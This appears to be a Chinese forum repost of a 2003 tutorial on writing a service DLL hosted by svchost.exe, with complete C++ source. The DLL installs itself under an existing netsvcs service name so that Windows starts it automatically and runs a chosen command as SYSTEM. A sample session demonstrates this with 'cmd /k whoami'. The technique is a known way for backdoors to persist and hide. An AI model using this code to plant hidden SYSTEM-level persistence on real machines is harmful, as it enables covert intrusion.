DLL服务本身只是创建一个进程,该程序命令行就是启动服务时提供的第一个参数,如果未指定就使用缺省的svchostdll.exe。启动服务时如果提供第二个参数,创建的进程就是和桌面交互的。

具体代码参见后边的附例8,源代码和DLL文件请到http://www.binglesite.net下载。

//main service process function
void __stdcall ServiceMain( int argc, wchar_t* argv[] );
//report service stat to the service control manager
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
//service control handler, call back by service control manager
void __stdcall ServiceHandler( DWORD dwCommand );
//RealService just create a process
int RealService(char *cmd, int bInteract);

//Install this dll as a Service host by svchost.exe, service name is given by
caller
int InstallService(char *name);
//unInstall a Service, be CARE FOR call this to delete a service
int UninstallService(char *name);
//Install this dll as a Service host by svchost.exe, used by RUNDLL32.EXE to
call
void CALLBACK RundllInstallA(HWND hwnd, HINSTANCE hinst, char *param, int
nCmdShow);
//unInstall a Service used by RUNDLL32.EXE to call, be CARE FOR call this to
delete a service
void CALLBACK RundllUninstallA(HWND hwnd, HINSTANCE hinst, char *param, int
nCmdShow);

//output the debug infor into log file(or stderr if a console program call me) &
DbgPrint
void OutputString( char *lpFmt, ... );


6. 代码使用
C:>tlist -s
0 System Process
8 System
240 services.exe Svcs:
Browser,Dhcp,dmserver,Dnscache,Eventlog,lanmanserver,lanmanworkstation,
LmHosts,PlugPlay,ProtectedStorage,TrkWks,Wmi
504 svchost.exe Svcs: RpcSs
1360 svchost.exe Svcs: EventSystem,Netman,RasMan,SENS,TapiSrv

C:>rundll32 svchostdll.dll,RundllInstall abcd
SvcHostDLL: DllMain called DLL_PROCESS_ATTACH
you specify service name not in Svchost etsvcs, must be one of following:
- EventSystem
- Ias
- Iprip
- Irmon
- Netman
- Nwsapagent
- Rasauto
- Rasman
- Remoteaccess
- SENS
- Sharedaccess
- Tapisrv
- Ntmssvc
- wzcsvc

C:>rundll32 svchostdll.dll,RundllInstall IPRIP
SvcHostDLL: DllMain called DLL_PROCESS_ATTACH
CreateService(IPRIP) SUCCESS. Config it
Config service IPRIP ok.

C:>sc start iprip "cmd /k whoami" 1
NT AUTHORITYSYSTEM

SvcHostDLL: ServiceMain(3, IPRIP) called
SvcHostDLL: RealService called cmd /k whoami Interact
SvcHostDLL: CreateProcess(cmd /k whoami) to 640

C:>tlist -s
0 System Process
8 System
240 services.exe Svcs:
Browser,Dhcp,dmserver,Dnscache,Eventlog,lanmanserver,lanmanworkstation,
LmHosts,PlugPlay,ProtectedStorage,TrkWks,Wmi
504 svchost.exe Svcs: RpcSs
640 cmd.exe Title: C:WINNTSystem32cmd.exe
1360 svchost.exe Svcs: EventSystem,Netman,RasMan,SENS,TapiSrv,IPRIP

C:>net stop iprip
The IPRIP service was stopped successfully.

C:>rundll32 svchostdll.dll,RundllUninstall iprip
DeleteService(IPRIP) SUCCESS.


7. 参考

Platform SDK: Tools - Rundll32
1) Inside Win32 Services, Part 2 by: Mark Russinovich, at:
http://www.winnetmag.com/Article ... cleID=8943&pg=3
2) Platform SDK: Tools - Rundll32, at:
http://msdn.microsoft.com/library/en-us/tools/tools/rundll32.asp

2003/8


8. 代码
// SvcHostDLL.cpp : Demo for a service dll used by svchost.exe to host it.
//
// for detail comment see articles.
// by bingle_at_email.com.cn
// www.BingleSite.net
//
/* save following as a .def file to export function, only ServiceMain is needed.
other used to install & uninstall service.
or use /EXPORT: link option to export them.

EXPORTS
ServiceMain
InstallService
UninstallService
RundllUninstallA
RundllInstallA
*/
/*
To compile & link:
cl /MD /GX /LD svchostdll.cpp /link
advapi32.lib /DLL /base:0x71000000 /export:ServiceMain
/EXPORT:RundllUninstallA /EXPORT:RundllInstallA
/EXPORT:InstallService /EXPORT:UninstallService
*/

//
// Articles:
// 1. HOWTO Create a service dll used by svchost.exe by bingle, at:
http://www.BingleSite.net/article/svchost-dll-service.html
// 2. Inside Win32 Services, Part 2 by: Mark Russinovich, at:
http://www.winnetmag.com/Article ... cleID=8943&pg=3
// 3. Platform SDK: Tools - Rundll32, at:
http://msdn.microsoft.com/library/en-us/tools/tools/rundll32.asp

#include
#include
#include
#include

#define DEFAULT_SERVICE "IPRIP"
#define MY_EXECUTE_NAME "SvcHostDLL.exe"

//main service process function
void __stdcall ServiceMain( int argc, wchar_t* argv[] );
//report service stat to the service control manager
int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress );
//service control handler, call back by service control manager
void __stdcall ServiceHandler( DWORD dwCommand );
//RealService just create a process
int RealService(char *cmd, int bInteract);

//Install this dll as a Service host by svchost.exe, service name is given by
caller
int InstallService(char *name);
//unInstall a Service, be CARE FOR call this to delete a service
int UninstallService(char *name);
//Install this dll as a Service host by svchost.exe, used by RUNDLL32.EXE to
call
void CALLBACK RundllInstallA(HWND hwnd, HINSTANCE hinst, char *param, int
nCmdShow);
//unInstall a Service used by RUNDLL32.EXE to call, be CARE FOR call this to
delete a service
void CALLBACK RundllUninstallA(HWND hwnd, HINSTANCE hinst, char *param, int
nCmdShow);

//output the debug infor into log file(or stderr if a console program call me) &
DbgPrint
void OutputString( char *lpFmt, ... );


//dll module handle used to get dll path in InstallService
HANDLE hDll = NULL;
//Service HANDLE & STATUS used to get service state
SERVICE_STATUS_HANDLE hSrv;
DWORD dwCurrState;


BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
hDll = hModule;
#ifdef _DEBUG
AllocConsole();
OutputString("SvcHostDLL: DllMain called DLL_PROCESS_ATTACH");
break;

case DLL_THREAD_ATTACH:
OutputString("SvcHostDLL: DllMain called DLL_THREAD_ATTACH");
case DLL_THREAD_DETACH:
OutputString("SvcHostDLL: DllMain called DLL_THREAD_DETACH");
case DLL_PROCESS_DETACH:
TellSCM( SERVICE_STOP_PENDING, 0, 0 );
Sleep(1500);
TellSCM( SERVICE_STOPPED, 0, 0 );
OutputString("SvcHostDLL: DllMain called DLL_PROCESS_DETACH");
#endif
break;
}

return TRUE;
}


void __stdcall ServiceMain( int argc, wchar_t* argv[] )
{
// DebugBreak();
char svcname[256];
strncpy(svcname, (char*)argv[0], sizeof svcname); //it s should be unicode, but
if it s ansi we do it well
wcstombs(svcname, argv[0], sizeof svcname);
OutputString("SvcHostDLL: ServiceMain(%d, %s) called", argc, svcname);

hSrv = RegisterServiceCtrlHandler( svcname, (LPHANDLER_FUNCTION)ServiceHandler
);
if( hSrv == NULL )
{
OutputString("SvcHostDLL: RegisterServiceCtrlHandler %S failed", argv[0]);
return;
}else FreeConsole();

TellSCM( SERVICE_START_PENDING, 0, 1 );
TellSCM( SERVICE_RUNNING, 0, 0 );

// call Real Service function noew
if(argc > 1)
strncpy(svcname, (char*)argv[1], sizeof svcname),
wcstombs(svcname, argv[1], sizeof svcname);
RealService(argc > 1 ? svcname : MY_EXECUTE_NAME, argc > 2 ? 1 : 0);

do{
Sleep(10);//not quit until receive stop command, otherwise the service will stop
}while(dwCurrState != SERVICE_STOP_PENDING && dwCurrState != SERVICE_STOPPED);

OutputString("SvcHostDLL: ServiceMain done");
return;
}

int TellSCM( DWORD dwState, DWORD dwExitCode, DWORD dwProgress )
{
SERVICE_STATUS srvStatus;
srvStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
srvStatus.dwCurrentState = dwCurrState = dwState;
srvStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP |
SERVICE_ACCEPT_PAUSE_CONTINUE | SERVICE_ACCEPT_SHUTDOWN;
srvStatus.dwWin32ExitCode = dwExitCode;
srvStatus.dwServiceSpecificExitCode = 0;
srvStatus.dwCheckPoint = dwProgress;
srvStatus.dwWaitHint = 3000;
return SetServiceStatus( hSrv, &srvStatus );
}

void __stdcall ServiceHandler( DWORD dwCommand )
{
// not really necessary because the service stops quickly
switch( dwCommand )
{
case SERVICE_CONTROL_STOP:
TellSCM( SERVICE_STOP_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_STOP");
Sleep(10);
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
case SERVICE_CONTROL_PAUSE:
TellSCM( SERVICE_PAUSE_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_PAUSE");
TellSCM( SERVICE_PAUSED, 0, 0 );
break;
case SERVICE_CONTROL_CONTINUE:
TellSCM( SERVICE_CONTINUE_PENDING, 0, 1 );
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_CONTINUE");
TellSCM( SERVICE_RUNNING, 0, 0 );
break;
case SERVICE_CONTROL_INTERROGATE:
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_INTERROGATE");
TellSCM( dwCurrState, 0, 0 );
break;
case SERVICE_CONTROL_SHUTDOWN:
OutputString("SvcHostDLL: ServiceHandler called SERVICE_CONTROL_SHUTDOWN");
TellSCM( SERVICE_STOPPED, 0, 0 );
break;
}
}


//RealService just create a process
int RealService(char *cmd, int bInteract)
{
OutputString("SvcHostDLL: RealService called %s %s", cmd, bInteract ? "Interact"
: "");
STARTUPINFO si = {0};
PROCESS_INFORMATION pi;
si.cb = sizeof si;
if(bInteract) si.lpDesktop = "WinSta0Default";
if(!CreateProcess(NULL, cmd, NULL, NULL, false, 0, NULL, NULL, &si, π))
OutputString("SvcHostDLL: CreateProcess(%s) error:%d", cmd, GetLastError());
else OutputString("SvcHostDLL: CreateProcess(%s) to %d", cmd, pi.dwProcessId);

return 0;
}


int InstallService(char *name)
{
// Open a handle to the SC Manager database.
int rc = 0;
HKEY hkRoot = HKEY_LOCAL_MACHINE, hkParam = 0;
SC_HANDLE hscm = NULL, schService = NULL;

try{
char buff[500];
char *svcname = DEFAULT_SERVICE;
if(name && name[0]) svcname = name;

//query svchost setting
char *ptr, *pSvchost = "SOFTWAREMicrosoftWindows NTCurrentVersionSvchost";
rc = RegOpenKeyEx(hkRoot, pSvchost, 0, KEY_QUERY_VALUE, &hkRoot);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_QUERY_VALUE error %d.", pSvchost, rc);
throw "";
}

DWORD type, size = sizeof buff;
rc = RegQueryValueEx(hkRoot, "netsvcs", 0, &type, (unsigned char*)buff, &size);
RegCloseKey(hkRoot);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegQueryValueEx(Svchost
etsvcs)";

for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
if(stricmp(ptr, svcname) == 0) break;

if(*ptr == 0)
{
OutputString("you specify service name not in Svchost
etsvcs, must be one of
following:");
for(ptr = buff; *ptr; ptr = strchr(ptr, 0)+1)
OutputString(" - %s", ptr);
throw "";
}

//install service
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hscm == NULL)
throw "OpenSCManager()";

char *bin = "%SystemRoot%System32svchost.exe -k netsvcs";

schService = CreateService(
hscm, // SCManager database
svcname, // name of service
NULL, // service name to display
SERVICE_ALL_ACCESS, // desired access
SERVICE_WIN32_SHARE_PROCESS, // service type
SERVICE_AUTO_START, // start type
SERVICE_ERROR_NORMAL, // error control type
bin, // service s binary
NULL, // no load ordering group
NULL, // no tag identifier
NULL, // no dependencies
NULL, // LocalSystem account
NULL); // no password

if (schService == NULL)
{
OutputString("CreateService(%s) error %d", svcname, rc = GetLastError());
throw "";
}
OutputString("CreateService(%s) SUCCESS. Config it", svcname);

CloseServiceHandle(schService);
CloseServiceHandle(hscm);

//config service
hkRoot = HKEY_LOCAL_MACHINE;
strncpy(buff, "SYSTEMCurrentControlSetServices", sizeof buff);
strncat(buff, svcname, 100);
rc = RegOpenKeyEx(hkRoot, buff, 0, KEY_ALL_ACCESS, &hkRoot);
if(ERROR_SUCCESS != rc)
{
OutputString("RegOpenKeyEx(%s) KEY_SET_VALUE error %d.", svcname, rc);
throw "";
}

rc = RegCreateKey(hkRoot, "Parameters", &hkParam);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegCreateKey(Parameters)";

if(!GetModuleFileName(HMODULE(hDll), buff, sizeof buff))
throw "GetModuleFileName() get dll path";

rc = RegSetValueEx(hkParam, "ServiceDll", 0, REG_EXPAND_SZ, (unsigned
char*)buff, strlen(buff)+1);
SetLastError(rc);
if(ERROR_SUCCESS != rc)
throw "RegSetValueEx(ServiceDll)";

OutputString("Config service %s ok.", svcname);
}catch(char *str)
{
if(str && str[0])
{
rc = GetLastError();
OutputString("%s error %d", str, rc);
}
}

RegCloseKey(hkRoot);
RegCloseKey(hkParam);
CloseServiceHandle(schService);
CloseServiceHandle(hscm);

return rc;
}

/*
used to install by rundll32.exe
Platform SDK: Tools - Rundll32
The Run DLL utility (Rundll32.exe) included in Windows enables you to call
functions exported from a 32-bit DLL. These functions must have the following
syntax:
*/
void CALLBACK RundllInstallA(
HWND hwnd, // handle to owner window
HINSTANCE hinst, // instance handle for the DLL
char *param, // string the DLL will parse
int nCmdShow // show state
)
{
InstallService(param);
}


int UninstallService(char *name)
{
int rc = 0;
SC_HANDLE schService;
SC_HANDLE hscm;

__try{
hscm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (hscm == NULL)
{
OutputString("OpenSCManager() error %d", rc = GetLastError() );
return rc;
}

char *svcname = DEFAULT_SERVICE;
if(name && name[0]) svcname = name;

schService = OpenService(hscm, svcname, DELETE);
if (schService == NULL)
{
OutputString("OpenService(%s) error %d", svcname, rc = GetLastError() );
return rc;
}

if (!DeleteService(schService) )
{
OutputString("OpenService(%s) error %d", svcname, rc = GetLastError() );
return rc;
}

OutputString("DeleteService(%s) SUCCESS.", svcname);
}__except(1)
{
OutputString("Exception Catched 0x%X", GetExceptionCode());
}

CloseServiceHandle(schService);
CloseServiceHandle(hscm);
return rc;
}

/*
used to uninstall by rundll32.exe
Platform SDK: Tools - Rundll32
The Run DLL utility (Rundll32.exe) included in Windows enables you to call
functions exported from a 32-bit DLL. These functions must have the following
syntax:
*/
void CALLBACK RundllUninstallA(
HWND hwnd, // handle to owner window
HINSTANCE hinst, // instance handle for the DLL
char *param, // string the DLL will parse
int nCmdShow // show state
)
{
UninstallService(param);
}

//output the debug infor into log file & DbgPrint
void OutputString( char *lpFmt, ... )
{
char buff[1024];
va_list arglist;
va_start( arglist, lpFmt );
_vsnprintf( buff, sizeof buff, lpFmt, arglist );
va_end( arglist );

DWORD len;
HANDLE herr = GetStdHandle(STD_OUTPUT_HANDLE);
if(herr != INVALID_HANDLE_VALUE)
{
WriteFile(herr, buff, strlen(buff), &len, NULL);
WriteFile(herr, " ", 2, &len, NULL);
}else
{
FILE *fp = fopen("SvcHost.DLL.log", "a");
if(fp)
{
char date[20], time[20];
fprintf(fp, "%s %s - %s ", _strdate(date), _strtime(time), buff);
if(!stderr) fclose(fp);
}
}

OutputDebugString(buff);
}
第1部分/共1部分    [1]

* 相关文章

   * Securing Apache: Step-by-Step
   * Linux下硬盘分区的最佳方案
   * 三层交换阻击DoS攻击
   * Win2000 Server入侵监测揭秘
   * The Value of Honeypots, Part Two: Honeypot Solutions and Leg

since 2003-12 版权所有(C) 2003 - 2006 一孔之见 All rights reserved    沪ICP备05053386号  [ITSUN统计]
Alexa Certified Site Stats for www.ykzj.org
玩世不恭彼此 ⌒ ˇ互相鼓励信任 認眞體驗每⒈兲.!﹏演藝⒉.個亾啲莞鎂傳奇( [淇]儭滗.

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题